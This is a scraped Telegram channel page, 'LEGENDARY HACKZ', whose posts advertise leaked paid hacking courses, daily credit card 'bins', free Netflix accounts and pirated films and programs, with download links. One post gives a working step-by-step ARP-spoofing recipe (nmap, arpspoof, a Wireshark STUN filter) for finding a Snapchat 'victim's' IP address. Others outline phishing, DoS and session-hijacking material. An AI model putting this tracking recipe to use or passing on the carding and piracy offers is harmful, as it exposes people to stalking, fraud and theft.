LEGENDARY HACKZ

Logo of telegram channel legendary_hackz — LEGENDARY HACKZ L
Logo of telegram channel legendary_hackz — LEGENDARY HACKZ
Channel address: @legendary_hackz
Categories: Leaks
Language: English
Subscribers: 3.12K
Description from channel

💙 GET ALL PAID HACKING CONTENTS FOR FREE.💙
💖PAID EBOOKS!
💖BLACKHAT COURSES LEAKED!
💖DAILY PREMIUM BINS!
💖PAID TUTORIALS AND COURSES LEAKED!
💖DAILY PRIVATE HACKING TUTORIALS.

Ratings & Reviews

3.33

3 reviews

Reviews can be left only by registered users. All reviews are moderated by admins.

5 stars

1

4 stars

1

3 stars

0

2 stars

0

1 stars

1


The latest Messages 10

31 Aug 2021
HOW TO MAKE HQ KEYWORDS

TUTORIAL ON HOW TO MAKE HQ KEYWORDS BY @DSCONFIGS

CREDITS @DSCONFIGS

LEECHERS LEECH WITH CREDITS ELSE BE READY
14 views 〘CID〙мя. ηєωвιє || 【★𝘽𝙂-𝙓★】, 13:01
Open / Comment
31 Aug 2021
Join our Backup Channel

Premium unlocked apps for free
Hacked Games and softwares
Exclusive Mods of DumpMods
Unique apps, hacking apps & more
Photo and video editing apps

Private Channel Link :
https://t.me/joinchat/RftajXtguEZcjtoO
https://t.me/joinchat/RftajXtguEZcjtoO

Limited Time Link
No Entry After Link Deleted
56 views『𝐈ɴ𝐃 』 LiL Mohit, 10:40
Open / Comment
31 Aug 2021
Cryptography Course

Cryptography is the study of secure communications techniques that allow only the sender and intended recipient of a message to view its contents. The term is derived from the Greek word kryptos, which means hidden.

Cryptography can be broken down into three different types:

Secret Key Cryptography.

Public Key Cryptography.

Hash Functions.

Cryptography-Test
https://imk.tiiny.site


Tools

https://play.google.com/store/apps/details?id=com.nitramite.cryptography
https://www.101computing.net/enigma-machine-emulator/
https://www.dcode.fr/all-tools
https://cryptii.com
https://www.online-toolz.com/tools/text-encryption-decryption.php

Pass=@its_me_kali
75 views🇰ꪖꪶỉ᭢ᦋꪹꪖꪖ🇯‌ ✺ , 09:27
Open / Comment
31 Aug 2021
T¹+
Top Trending Channel's


02k 》 FREE NETFLIX ACC & BINS & CCS
01k 》ғʀᴇᴇ ᴘʀᴇᴍɪᴜᴍ ɴᴇᴛғʟɪx ᴀᴄᴄᴏᴜɴᴛs
03k 》 NETFLIX MODS
03k 》Tech Apps Games
⊷••⊷
02k 》Hacking & mod apps
02k 》In My Feelings
02k 》 Genuine premium accounts
⊷••⊷
01k 》Free Premium Accounts
01k 》FREE NETFLIX Mod
01k 》 ᴘʀᴏғɪʟᴇ ᴘɪᴄᴛᴜʀᴇs
01k 》 BEST MEMES
01k 》Premium Bins
01k 》Hacking Material Books
01k 》FREE Insta Hacking Database
01k 》FREE Discography
01k 》PRIME GIVEAWAYS
01k 》Paid Hacks For Free
01k 》FREE LOOTERS
⊷••⊷
09H 》Hacking & mod apps
06H 》 Cyber Security Giveaways
01k 》 Daily Netflix Premium Giveaways
⊷••⊷⊷••⊷⊷••

ㅤㅤㅤ 4 Hours Top, 7 Hours In Channel
ㅤㅤㅤ Add Your Channel
97 viewsThanos, 05:38
Open / Comment
30 Aug 2021
HAPPY JANMASHTAMI 2021

PROGRAMMING पुराण (Videos)

GOlang
Ruby
Python
Php
MySql
Aiml
C++
C#
CSS
Django
Elm
Java
Jenkins
Jquery
Matlab
Kotlin
MongoDb
Perl
Rpython
Scala
Swift
Sql
Shell
Git

https://mega.nz/folder/3hh22RpI

Key=@kalingraajworld

App For practice coding in android
https://play.google.com/store/apps/details?id=com.paprbit.dcoder

Regards=@its_me_kali
283 views🇰ꪖꪶỉ᭢ᦋꪹꪖꪖ🇯‌ ✺ , 05:46
Open / Comment
30 Aug 2021
HOW TO HIDE YOUR TEXT INSIDE AND IMAGE

STEGANOGRAPHY TUTORIAL

A Post to read something about It

Link :— Click on Me

Tutorial Video :—



Credit :— @its_newbie

#newbie

LEACHERS COPY WITH CREDIT
267 views мя. ηєωвιє || 【★𝘽𝙂-𝙓★】 || 𝚅𝙴𝚁𝙸𝙵𝙸𝙴𝙳 𝙲𝙻𝚄𝙱 [OWNER], 03:23
Open / Comment
29 Aug 2021
2021 WEB-H4CKING GUIDE

Top techniques which hackers use for web hacking :

SQL Injection attacks
Cross Site Scripting (XSS)
Denial of Service (DoS/DDoS)
Cross-site request forgery (CSRF or XSRF)
DNS Spoofing (DNS cache poisoning)
Social engineering techniques
By Itsmekali
Phishing
Baiting
Pretexting
Dorking


https://mega.nz/folder/5OxWGCQS#q7R_62r30NZI_aavJoeplQ

https://drive.google.com/folderview?id=10NQBRdP3ddUWUlK4zY6ZdrZWZiLkuKe-

Regards=@its_me_kali
400 views🇰ꪖꪶỉ᭢ᦋꪹꪖꪖ🇯‌ ✺ , 03:38
Open / Comment
28 Aug 2021
ALL ABOUT PORTS 2021

https://telegra.ph/Port-Forwarding-without-router-01-30


WHAT IS PORT ?


We can say that A port number is a way to identify a specific process to which an Internet or other network message is to be forwarded when it arrives at a server.
A port number uniquely identifies a network-based application on a computer.A port number is the logical address of each application or process that uses a network or the Internet to communicate. In a server, more than one user process can use TCP at the same time. To identify the data associated with each process, port numbers are used. Port numbers are 16-bit, and numbers up to 65535 are possible.

Here are some Important port number for you :

 

20:                              File Transfer Protocol (FTP) Data Transfer

21:                              File Transfer Protocol (FTP) Command Control

22:                              Secure Shell (SSH) Secure Login

23:                              Telnet remote login service, unencrypted text messages

25:                              Simple Mail Transfer Protocol (SMTP) E-mail routing

53:                              Domain Name System (DNS) service

67and 68:                 Dynamic Host Configuration Protocol (DHCP) servers use UDP port 67 to listen for requests while DHCP clients communicate on UDP port 68.

69:                        TFTP(Trivial File Transfer Protocol) TFTP offers a method of file transfer without the session establishment requirements that FTP uses. Because TFTP uses UDP instead of TCP

80:                              Hypertext Transfer Protocol (HTTP) used in the World Wide Web

88:                         The Xbox Live Internet gaming service uses several different port numbers including UDP port 88.

110:                            Post Office Protocol (POP3)

119:                            Network News Transfer Protocol (NNTP)

123:                            Network Time Protocol (NTP)

137/138/139              NetBIOS

143:                         Internet Message Access Protocol (IMAP) Management of digital mail

161and 162:              Simple Network Management Protocol (SNMP)

194:                           Internet Relay Chat (IRC)

389                            Lightweight Directory Access Protocol (LDAP)

443:                           HTTP Secure (HTTPS) HTTP over TLS/SSL

The registered ports are those from 1024 through 49151. IANA maintains the official list of well-known and registered ranges. The dynamic or private ports are those from 49152 through 65535. One common use for this range is for ephemeral ports.

REGARDS=@its_me_kali
99 views🇰ꪖꪶỉ᭢ᦋꪹꪖꪖ🇯‌ ✺ , 09:14
Open / Comment
28 Aug 2021
COMPLETE HACKING COURSE

Ethical Hacking Complete Course

Original Price:- Atleast 20,000

What will you learn in this course :

Important Terms Used In Ethical Hacking
Introduction To Footprinting
Get Information From Website Name
How To Collect Information Using E-mail
Information Collection Using Network
Information Gathering Using Search Engine
Deep learn Of Footprinting (conclusion)
How To Disable Httrack & Web Mirroring
Completely Hide Your Personl Details From Internet
Practical Of Ip Address And Local Host
Introduction To Ip Addres
Virtual Lab Setting
Introduction To Proxy
How To Use Tor Browser
How To Use Multiple Proxies
How To Use Free Proxy Server
What Is Scanning
Live Network, Port And Ip Scanning
How To Check Target Basic Details
Banner Grabbing Explained With Practical
Vulnerability Scanning Explained
Mask Your Banner To Confuse Hackers
Close Open Ports And Secure Your Data
What Is Enumeration
Web Enumeration Explained
Netbios Enumeration Practical
System Hacking Explained
How To Work In Computer Without Login
How To Recover Windows Password
What Is Virus, Malware And Worms Explained
What Is Trojan Explained
Virus Maker Explained
The Working Of Trojan
What Is Sniffing Explained
What Is Man In The Middle Attack Explained
What Is Mac Flooding Attack
Penetst Sniffing
What Is Spoofing Explained
What Is Arp Spoofing Explained With Practical
Mac Address Spoofing Explained
Email Spoofing Explained With Practical
What Is Social Engineering
What Is Phishing Explained
online phishing
How To Setup A Lab For Online Hacking
How To Create A Page In Phishing
How To Detect And Prevent Phishing
What Is Dos & Ddos Attack Explaind
Dos Attack A Small Demo
Different Ways Of Dos & Ddos
A Unique Method Of Dos Using Google
ways To protect Dos & ddos
What Is Cookie Stealing Demo
Sidejacking Explained With Practical
Session Hijacking Explained
Session Hijacking Explained With Practical
Web Application And Server Explained
How To Install Dvwa And Mutillide On Virtual Box
How To Collect Server Information Of Any Website Live
What Is Buffer Overflow Explained
Practical Of Buffer Overflow On Website
Lab Setting For Buffer Overflow
Buffer Overflow Explained With Practical
Cross Site Scripting Attack Explained
Cross Site Scripting Attack Demo
What Is Sql Injetion Explained
Live Sql Vulnerability Testing
Live Advance Sql Injection Practical
Best Way To Be Safe From Sql Injection
How To Catch Hackers Using Fake Info
What Is Steganography
Image & Text Steganography Practical
Video & Audio Steganography Practical
Redirect User Authentication Using Csrf
Pentesting With Formula Injection
Penetesting With Css Injection
Path Traversal Attack Detection & Prevention
Command Injection Explained With Demo
Web Hacking Using Repeater
Web Application Pentesting Bypass Website Info
Sensitive Infromation Stored In Target Tab Burp Suit
Scan Vulnerabilities In A Web Application
What Is Cryptography
How To Encrypt Or Decrypt Messages
Chat Anonymously With Anyone
Basic Terms Related To Wi-Fi
Best Mobile Security Tips
Latest Banking Security Tips

And Allots of more things except above.....

https://www.mediafire.com/file/6s6l144339ja2yl/Masters-In-Ethical-Hacking-Course-2-Gib-.7z/file

Just leave a for me if I was ever helpful or anything posted by me helped you

Enjoy
121 views『𝐈ɴ𝐃 』 LiL Mohit, 06:49
Open / Comment
27 Aug 2021
Finally Venom 2 Movie is Here

Title : 𝐕𝐄𝐍𝐎𝐌 2 (2021)
Genres :#Action #Adventure
Language : #Hindi #English
Rating 8.9/10 IMDb

Uploaded By https://t.me/joinchat/vm5EjrVdYb1hYWI1

𝐈𝐧𝐬𝐭𝐚𝐥𝐥 𝐏𝐋𝐀𝐘𝐢𝐭 𝐀𝐩𝐩 :
𝐂𝐡𝐚𝐧𝐠𝐞 𝐀𝐮𝐝𝐢𝐨 𝐓𝐫𝐚𝐜𝐤:
𝐖𝐚𝐭𝐜𝐡 𝐎𝐧𝐥𝐢𝐧𝐞/𝐃𝐨𝐰𝐧𝐥𝐨𝐚𝐝 𝐍𝐨𝐰 :

480p: https://kuklink.com/1/bnYyZTVsMDAwMDY2

720p: https://kuklink.com/1/bnYyZTVsMDAwMDY2

1080p: https://kuklink.com/1/bnYyZTVsMDAwMDY2

✯✯✯✯✯✯✯✯✯✯✯✯✯
𝐒𝐡𝐚𝐫𝐞 𝐀𝐧𝐝 𝐒𝐮𝐩𝐩𝐨𝐫𝐭
.
Join Now
https://t.me/joinchat/vm5EjrVdYb1hYWI1
95 views『𝐈ɴ𝐃 』 LiL Mohit, 15:30
Open / Comment
27 Aug 2021
Watch All New Movies & Web Series

Fast Download & Watch Online
#Marvel_Movie_Hindi
#Animation_Movies
#New_Upcoming_Movies
#New_Web_Series
#Hollywood_Bollywood_Tollywood

ᴡᴇʟᴄᴏᴍᴇᴅ ᴛᴏ ᴏᴜʀ ᴄʜᴀɴɴᴇʟ
ᴍᴀxɪᴍᴜᴍ ʟᴏᴡ sɪᴢᴇ ᴍᴏᴠɪᴇs ᴀᴠᴀɪʟᴀʙʟᴇ 250Mβ 400ᴍʙ 700Mβ 1.4ɢʙ

https://t.me/HD_Hollywood_moviess
https://t.me/HD_Hollywood_moviess
https://t.me/HD_Hollywood_moviess
https://t.me/HD_Hollywood_moviess
https://t.me/HD_Hollywood_moviess

𝐅𝐚𝐬𝐭 𝐉𝐨𝐢𝐧 𝐒𝐨𝐦𝐞𝐭𝐢𝐦𝐞𝐬 𝐀𝐟𝐭𝐞𝐫 𝐃𝐞𝐥𝐞𝐭𝐞
118 views『𝐈ɴ𝐃 』 LiL Mohit, 15:29
Open / Comment
27 Aug 2021
OS DESIGNING GUIDE 2021

Following are some of important functions of an operating System.

Memory Management
Processor Management
Device Management
File Management
Security
Control over system performance
Job accounting
Error detecting aids
Coordination between other software and users

Article
https://telegra.ph/OS-DESIGNING-BY-KALINGRAAJ-02-17

Top Os

Kali Os
https://bit.ly/3gBqx54
Tail Os
https://bit.ly/38eUO4U
Cerebus Os
https://bit.ly/38ohIGV
Digi77 Os
https://bit.ly/3DoSkPS
Whonix
https://bit.ly/2WmYL5q
Ubuntu Os
https://bit.ly/3gEmZPr
TraceLab Os
https://bit.ly/3ygcB6k
Garuda Os
https://bit.ly/3mDrNIK
Qube Os
https://bit.ly/3sOILVv
Other Os
https://bit.ly/3BgBmkF
https://bit.ly/2XWD3Fz

Regards=@ITS_ME_KALI
278 views🇰ꪖꪶỉ᭢ᦋꪹꪖꪖ🇯‌ ✺ , 07:06
Open / Comment
26 Aug 2021
Session Hijacking 2021

A session hijacking attack happens when an attacker takes over your internet session — for instance, while you're checking your credit card balance, paying your bills, or shopping at an online store. Session hijackers usually target browser or web application sessions.

Session Hijacking Techniques.

Types of Session Hijacking.

Prevention and security techniques .

MITM ,MITB,TCP,UDP techniques .

IP, ARP, DNS spoofing.

Session Fixation .

Tools for Hijacking .

Password=@its_me_kali
203 views🇰ꪖꪶỉ᭢ᦋꪹꪖꪖ🇯‌ ✺ , 06:17
Open / Comment
25 Aug 2021
ALL ABOUT INTELLIGENCE


Intelligence is the ability to learn from experience and adapt to the environment.

THREATINT
HUMINT
IMINT
SIGINT
MASINT
GEOINT
COMINT
ELINT
FISINT
IRINT
NUCINT
FININT
TECHINT
SOCMINT
OSINT
CYBINT
ACINT
Top Intelligence Agencies

Article
https://telegra.ph/Intelligence-And-Its-Types-By-IMK-08-25

Regards=@its_me_kali
258 views🇰ꪖꪶỉ᭢ᦋꪹꪖꪖ🇯‌ ✺ , 07:55
Open / Comment
24 Aug 2021
GET The Legendary Performer Program by Robin Sharma for Free:

Robin Sharma is one of the most sought after international speakers on the planet.

There’s no doubt that Robin has the superb ability to enchant and educate entire audiences and stand on the stage with giants, in fact, in the last 12 months alone he has shared the stage with Sir Richard Branson and spoken at conferences with Kofi Annan.

Very seldom is this type of offer open to the public, but at Robin’s request, we have an exclusive filming, taken from one of Robin’s iconic speeches to a private group.

And we are making this available to you!

It is highly unusual for Robin to allow an entire speech to be recorded, but this speech was one of his absolute favorites (and as usual, he received a standing ovation). Every person present at this event paid thousands of dollars to see Robin on stage.

SOURCE LINK:- http://www.robinsharma.com/academy/tgcb/eg/offer/lpp/

DOWNLOAD LINK:- https://gplinks.co/AHhmIL

How to open
https://t.me/HowToDownloadBot/6
245 views『𝐈ɴ𝐃 』 LiL Mohit, 12:30
Open / Comment
24 Aug 2021
How To Get IP Address Of Any Snapchat User

Easy MITM Attack

Required:
- Mac OS X / Kali Linux ( Or Any UNIX )
- A Phone Where You Have Snapchat On ( Im Assuming Its A Phone )
- Nmap
- Some Tools And Little MITM Knowledge

Download Wireshark Here
Download Arpspoof Here - MACOS only - Kali Linux Has This Already!

STEP -: 1. Fire Up Terminal And Ip Forward Your Laptop/pc With This Scripts:
Kali - sudo sysctl net.ipv4.ip_forward = 1
sudo net.ipv4.ip_forward = 1
Mac - sudo sysctl -w net.inet.ip.forwarding=1

STEP 2. Find Your Phone Device Local Ip And Write It Down.
Nmap -sn /24
Ex. nmap -sn (or -sP) 192.168.0.1/24

STEP 3. Spoof Your Phone.
arpspoof -i -t gateway
Ex(mac): arpspoof -i en0 -t 192.168.0.160 192.168.0.1

STEP 4. Fire up wireshark and filter On Your Phone Ip With Stun Protocol
ip.addr == && stun
Ex: ip.addr == 192.168.0.160 && stun

STEP 5. Call Your Victim On Snap And Keep Calling Him For Around 5 Seconds.

They Do Not Need Necessary To Answer
You Will See On Wireshark Some Binding Requests, Then Some Other Stun Ones.

credit : vikalxd
239 views『𝐈ɴ𝐃 』 LiL Mohit, 08:31
Open / Comment
23 Aug 2021
WEB PENTESTING 2021

A penetration test, also known as a pen test, is a simulated cyber attack against your computer system to check for exploitable vulnerabilities. In the context of web application security, penetration testing is commonly used to augment a web application firewall (WAF).

Top Tools

Netsparker
Arachni
BeEF
Acunetix
ImmuniWeb
Vega
Wapiti
SQLMap
ZED Attack Proxy

Cheatsheet
https://hausec.com/pentesting-cheatsheet/

Jobs

https://www.naukri.com/web-application-penetration-testing-jobs

https://www.upwork.com/freelance-jobs/penetration-testing/

Pass=@its_me_kali
195 views🇰ꪖꪶỉ᭢ᦋꪹꪖꪖ🇯‌ ✺ , 08:13
Open / Comment
23 Aug 2021
Bootstrap and HTML Ready to use Templates:-

Download 111 Bootstrap Ready to use Templates.

https://drive.google.com/drive/folders/1Gl6PT62ZBoN4J9AmHAvTpGc3mefTBT-w?usp=sharing

HTML 5 Ready to use Templates

https://drive.google.com/drive/folders/1btuHYf-vM8rwm_Ls_ni2eCj2-BbXzehV?usp=sharing

Download 400+ Premium Font Collections.

https://drive.google.com/drive/folders/1nKLeUNCmqgGFyPtwQiCpx9Su5RN4SD3N?usp=sharing

Share and support us for more
244 views『𝐈ɴ𝐃 』 LiL Mohit, 03:41
Open / Comment